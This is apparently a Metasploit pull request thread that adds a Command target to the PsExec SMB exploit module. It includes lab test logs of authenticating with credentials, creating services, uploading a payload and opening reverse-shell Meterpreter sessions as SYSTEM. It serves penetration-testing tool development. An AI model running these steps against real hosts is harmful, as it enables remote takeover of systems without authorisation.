Add a command target to the main PSexec module

[zeroSteiner]

This PR adds an ARCH_CMD compatible, "Command" target to the psexec module and deprecates the auxiliary/admin/smb/psexec_command module. The main exploit/windows/smb/psexec module was also updated to automatically select an appropriate SMB share if one isn't specified, this retains the old value of ADMIN$ for all of the non-Command targets, but allows it to be set to C$ for the new Command target. Since we now have support for RHOSTS it doesn't seem like we need a dedicated module to run commands and get their output any more.

The auxiliary/admin/smb/ms17_010_command module had also flipped the order of the RETRY and DELAY options which I corrected. I also added documentation to the psexec module and fixed up the long line errors from the msftidy_docs linter. The new section outlines what the Command target does and how to use it to run a custom command like the old module and what will happen if the command runs for a long time.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use auxiliary/admin/smb/psexec_command
  • See the deprecation warning, date and reason
• use exploit/windows/smb/psexec
  • Set the RHOST, SMBUser and SMBPass options appropriately
    • Leaving the target as Automatic, set a payload of a Meterpreter using your favorite stager
    • Run the module and receive a session
  • Changing the target to Command set the payload to cmd/windows/generic
    • Set the CMD option to something with output like ipconfig
    • Run the module and see the output

Example

msf5 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.159.129  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                                  no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBUser               smcintyre        no        The username to authenticate as


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   ipconfig         yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   4   Command


msf5 exploit(windows/smb/psexec) > exploit

[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[+] 192.168.159.129:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.129:445 - Getting the command output...
[*] 192.168.159.129:445 - Executing cleanup...
[+] 192.168.159.129:445 - Cleanup was successful
[+] 192.168.159.129:445 - Command completed successfully!
[*] 192.168.159.129:445 - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::41f8:356f:73d4:9415%10
   IPv4 Address. . . . . . . . . . . : 192.168.159.129
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.159.2

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 


[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) >```

[wvu]

The changes look pretty sensible to me! Thanks for doing this. :)

[bwatters-r7]

Since I already built the test config..... have a psexec test run:

[bwatters-r7]

And one with x64 payloads......
Failures on 8.1x86 expected....

[wvu]

Thanks so much, @bwatters-r7!

[wvu]

msf5 > use auxiliary/admin/smb/psexec_command

[!] *              The module auxiliary/admin/smb/psexec_command is deprecated!              *
[!] *                   This module will be removed on or about 2020-09-16                   *
[!] *Use exploit/windows/smb/psexec and the 'Command' target with the cmd/windows/generic payload*
msf5 auxiliary(admin/smb/psexec_command) >

msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] 172.16.249.159:445 - Connecting to the server...
[*] 172.16.249.159:445 - Authenticating to 172.16.249.159:445 as user 'User'...
[*] 172.16.249.159:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 172.16.249.159:445 - PowerShell found
[*] 172.16.249.159:445 - Selecting PowerShell target
[*] 172.16.249.159:445 - Powershell command length: 2600
[*] 172.16.249.159:445 - Executing the payload...
[*] 172.16.249.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Obtaining a service manager handle...
[*] 172.16.249.159:445 - Creating the service...
[+] 172.16.249.159:445 - Successfully created the service
[*] 172.16.249.159:445 - Starting the service...
[+] 172.16.249.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.249.159:445 - Removing the service...
[+] 172.16.249.159:445 - Successfully removed the service
[*] 172.16.249.159:445 - Closing service handle...
[*] Sending stage (200262 bytes) to 172.16.249.159
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.159:49675) at 2020-07-10 10:46:36 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDEV2004EVAL
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

msf5 exploit(windows/smb/psexec) > run

[*] 172.16.249.159:445 - Connecting to the server...
[*] 172.16.249.159:445 - Authenticating to 172.16.249.159:445 as user 'User'...
[*] 172.16.249.159:445 - Executing the command...
[*] 172.16.249.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Obtaining a service manager handle...
[*] 172.16.249.159:445 - Creating the service...
[+] 172.16.249.159:445 - Successfully created the service
[*] 172.16.249.159:445 - Starting the service...
[+] 172.16.249.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.249.159:445 - Removing the service...
[+] 172.16.249.159:445 - Successfully removed the service
[*] 172.16.249.159:445 - Closing service handle...
[*] 172.16.249.159:445 - Checking if the file is unlocked...
[*] 172.16.249.159:445 - Getting the command output...
[*] 172.16.249.159:445 - Executing cleanup...
[+] 172.16.249.159:445 - Cleanup was successful
[+] 172.16.249.159:445 - Command completed successfully!
[*] 172.16.249.159:445 - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::4114:6118:a915:a7d7%4
   IPv4 Address. . . . . . . . . . . : 172.16.249.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

[wvu]

Native upload:

msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] 172.16.249.159:445 - Connecting to the server...
[*] 172.16.249.159:445 - Authenticating to 172.16.249.159:445 as user 'User'...
[!] 172.16.249.159:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 172.16.249.159:445 - Uploading payload... BEogwfoz.exe
[*] 172.16.249.159:445 - Created \BEogwfoz.exe...
[*] 172.16.249.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Obtaining a service manager handle...
[*] 172.16.249.159:445 - Creating the service...
[+] 172.16.249.159:445 - Successfully created the service
[*] 172.16.249.159:445 - Starting the service...
[+] 172.16.249.159:445 - Service started successfully...
[*] 172.16.249.159:445 - Removing the service...
[+] 172.16.249.159:445 - Successfully removed the service
[*] 172.16.249.159:445 - Closing service handle...
[*] 172.16.249.159:445 - Deleting \BEogwfoz.exe...
[*] Sending stage (200262 bytes) to 172.16.249.159
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.159:49676) at 2020-07-10 10:50:39 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDEV2004EVAL
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

[wvu]

Release Notes

Improved PsExec support by adding an ARCH_CMD target to the exploit/windows/smb/psexec module and deprecating auxiliary/admin/smb/psexec_command.